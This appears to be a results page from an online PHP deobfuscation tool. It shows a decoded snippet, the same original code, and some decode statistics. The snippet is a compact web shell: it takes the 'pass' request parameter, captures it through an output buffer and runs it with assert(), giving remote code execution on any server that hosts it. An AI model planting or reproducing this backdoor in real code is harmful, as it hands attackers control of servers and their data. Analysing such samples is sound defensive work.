Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php $evalstr=""; ob_start(function ($c,$d){global $evalstr;$evalstr=$c;}); echo $_..
Decoded Output download
<?php
$evalstr="";
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>
Did this file decode correctly?
Original Code
<?php
$evalstr="";
ob_start(function ($c,$d){global $evalstr;$evalstr=$c;});
echo $_REQUEST['pass'];
ob_end_flush();
assert($evalstr);
?>
Function Calls
None |
Stats
MD5 | d51ebb152edecc56e46d2eab9f0a1337 |
Eval Count | 0 |
Decode Time | 144 ms |